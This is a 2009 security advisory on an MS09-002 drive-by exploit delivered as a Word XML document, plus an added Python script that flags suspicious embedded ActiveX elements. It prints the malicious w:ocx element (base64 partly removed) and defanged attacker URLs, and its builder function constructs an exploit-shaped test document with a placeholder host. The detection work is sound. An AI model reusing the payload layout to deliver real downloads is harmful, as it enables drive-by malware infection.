MS09-002 Exploit

March 3, 2009

The SonicWALL UTM Research Team has observed a new MS09-002 exploit being used in the wild in drive-by attacks.

This exploit is delivered to the end user as a Microsoft Word document with a .doc extension whose contents are actually Word's XML format (WordprocessingML). The extension is irrelevant: Word recognizes the XML content and opens it anyway, so filtering on extension alone does not block it. The file is 3,871 bytes and attempts to exploit the Uninitialized Memory Corruption vulnerability (CVE-2009-0075) in Internet Explorer 7 that Microsoft addressed in security bulletin MS09-002.

The malicious Word document contains the following specially crafted w:ocx element (part of the base64 data has been removed):

w:ocx w_data="DATA:application/x-oleobject;BASE64,rv0krsYD0RGLdgCAx0TziQAAOAAAAGgAdAB0AHA (REMOVED) gAZQBuAGcAagBpAHQAagAuAGMAbwBtAC8AYgBiAHMALwBpAG0AYQBnAGUAcwAvAGEAbABpAHAAYQB5AC8AbQBtAC8AagBjAC8AagBjAC4AaAB0AG0AbAA=" w_id="DefaultOcxName" w_name="DefaultOcxName" w_classid="CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389" w_w="200" w_h="123" wx_iPersistPropertyBag="true"

The base64 payload in w_data decodes to the same CLSID in its on-disk (little-endian) byte order, followed by the target URL encoded as UTF-16LE. When the end user opens the document, Word instantiates the Microsoft Scriptlet Component ActiveX control (CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389), which hosts the Internet Explorer rendering engine, and the control connects to the following malicious URL:

  • hxxp://(REMOVED)/bbs/images/alipay/mm/jc/jc.html [detected as GAV: XMLhttpd.D (Exploit)]

jc.html contains obfuscated JavaScript. The Word document itself only directs the Scriptlet control to this page; the exploit for CVE-2009-0075 runs when the embedded Internet Explorer engine renders it, and the script then downloads a Trojan from the following URL:

  • hxxp://(REMOVED)/bbs/images/alipay/mm/jc/jc.exe [detected as GAV: Rincux_4 (Trojan)]

At the time of writing the exploit document has very low antivirus detection; McAfee names it Exploit-MSWord.k. SonicWALL GAV detects this exploit as GAV: MSWord.K (Exploit).
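As an added example (not SonicWALL code and not a GAV signature), the following Python script triages the w:ocx element shown above the way an analyst would: it strips the DATA:application/x-oleobject;BASE64, prefix, reads the first 16 bytes as a little-endian CLSID, pulls any UTF-16LE http(s) URL out of the remainder, and flags the element when the CLSID is the Scriptlet Component's, when a URL is embedded at all, or when the CLSID inside the blob disagrees with the declared w:classid. The test document is constructed inline with a placeholder host; the six bytes between the CLSID and the URL are copied from the decoded prefix of the advisory's own data and are not interpreted; the namespace URIs in the sample are assumed; attribute names are accepted with either ':' or '_' as the separator because the copy above prints w_data where the WordprocessingML schema uses w:data. The blob layout beyond the CLSID is a heuristic read off the sample, not a documented format.

```python
"""Triage helper for Word 2003 XML documents that embed an ActiveX control via
<w:ocx>, as in the MS09-002 sample above. Added example, not SonicWALL code;
the blob layout (LE CLSID, six uninterpreted bytes, UTF-16LE URL) is read off
the decoded prefix printed in the advisory and is a heuristic, not a spec."""
import base64
import re
import uuid

SCRIPTLET_CLSID = "AE24FDAE-03C6-11D1-8B76-0080C744F389"  # from the advisory
# First 39 base64 chars of the sample's data attribute, as printed, plus padding.
ADVISORY_DATA_PREFIX = "rv0krsYD0RGLdgCAx0TziQAAOAAAAGgAdAB0AHA="

# Namespace separator accepted as ':' or '_': extracted copies of the sample
# print w_data where the WordprocessingML schema uses w:data.
_OCX_RE = re.compile(r"<w:ocx\b([^>]*)/?>", re.IGNORECASE | re.DOTALL)
_ATTR_RE = re.compile(r'(\w+)[:_](\w+)\s*=\s*"([^"]*)"')
# UTF-16LE "http://" or "https://" followed by printable ASCII code units.
_UTF16_URL_RE = re.compile(
    rb"[hH]\x00[tT]\x00[tT]\x00[pP]\x00(?:[sS]\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")


def decode_ocx_data(value):
    """Strip the DATA:<mime>;BASE64, prefix; drop whitespace that line
    wrapping (as in the copy above) inserted; fix padding; decode."""
    m = re.match(r"DATA:[^;]+;BASE64,", value, re.IGNORECASE)
    if not m:
        raise ValueError("not a DATA:...;BASE64, attribute")
    b64 = re.sub(r"\s+", "", value[m.end():])
    return base64.b64decode(b64 + "=" * (-len(b64) % 4))


def clsid_from_blob(blob):
    """The persisted object starts with its CLSID in on-disk little-endian
    GUID order; return it in the registry form that w:classid uses."""
    if len(blob) < 16:
        raise ValueError("blob too short to hold a CLSID")
    return str(uuid.UUID(bytes_le=blob[:16])).upper()


def urls_from_blob(blob):
    """Every UTF-16LE http(s) URL in the blob, wherever it sits."""
    return [m.group(0).decode("utf-16-le") for m in _UTF16_URL_RE.finditer(blob)]


def advisory_prefix_clsid():
    """CLSID recovered from the advisory's own truncated data attribute."""
    return clsid_from_blob(base64.b64decode(ADVISORY_DATA_PREFIX))


def scan_word_xml(xml_text):
    """One finding per <w:ocx> element in the document."""
    findings = []
    for ocx in _OCX_RE.finditer(xml_text):
        attrs = {local.lower(): val for _, local, val in _ATTR_RE.findall(ocx.group(1))}
        declared = attrs.get("classid", "").upper().replace("CLSID:", "")
        f = {"declared_clsid": declared, "blob_clsid": None, "urls": []}
        if "data" in attrs:
            try:
                blob = decode_ocx_data(attrs["data"])
                f["blob_clsid"] = clsid_from_blob(blob)
                f["urls"] = urls_from_blob(blob)
            except ValueError:
                pass  # malformed data: still report the element
        # Flag the Scriptlet control (it renders any URL it is given with the
        # IE engine), any persisted object carrying a URL, and a blob CLSID
        # that disagrees with the declared w:classid.
        f["suspicious"] = (SCRIPTLET_CLSID in (declared, f["blob_clsid"])
                           or bool(f["urls"])
                           or (f["blob_clsid"] is not None and f["blob_clsid"] != declared))
        findings.append(f)
    return findings


def build_sample_blob(url):
    """Constructed blob in the sample's layout: LE CLSID, the six bytes that
    follow it in the advisory's prefix (not interpreted), the URL as UTF-16LE."""
    return uuid.UUID(SCRIPTLET_CLSID).bytes_le + b"\x00\x00\x38\x00\x00\x00" + url.encode("utf-16-le")


# Constructed test document: the sample's attribute layout with a placeholder
# host; the namespace declarations are assumed.
SAMPLE_URL = "http://example.invalid/bbs/images/alipay/mm/jc/jc.html"
SAMPLE_XML = (
    '<?xml version="1.0"?><w:wordDocument xmlns:w="http://schemas.microsoft.com/office/word/2003/wordml"'
    ' xmlns:wx="http://schemas.microsoft.com/office/word/2003/auxHint"><w:body><w:p><w:r><w:pict>'
    '<w:ocx w:data="DATA:application/x-oleobject;BASE64,'
    + base64.b64encode(build_sample_blob(SAMPLE_URL)).decode()
    + '" w:id="DefaultOcxName" w:name="DefaultOcxName" w:classid="CLSID:' + SCRIPTLET_CLSID
    + '" w:w="200" w:h="123" wx:iPersistPropertyBag="true"/></w:pict></w:r></w:p></w:body></w:wordDocument>')

if __name__ == "__main__":
    print("CLSID in the advisory's data prefix:", advisory_prefix_clsid())
    for finding in scan_word_xml(SAMPLE_XML):
        print(finding)
```

Run as a script it prints the CLSID recovered from the advisory's own data prefix and one finding for the constructed document; scan_word_xml() can be pointed at the text of any .doc that starts with an XML declaration. The decoder discards whitespace before decoding because the base64 in the copy above is line-wrapped and would otherwise fail to decode cleanly; a detection that keys only on the w:classid attribute misses the case where the persisted blob names a different control, which is why both CLSIDs are compared.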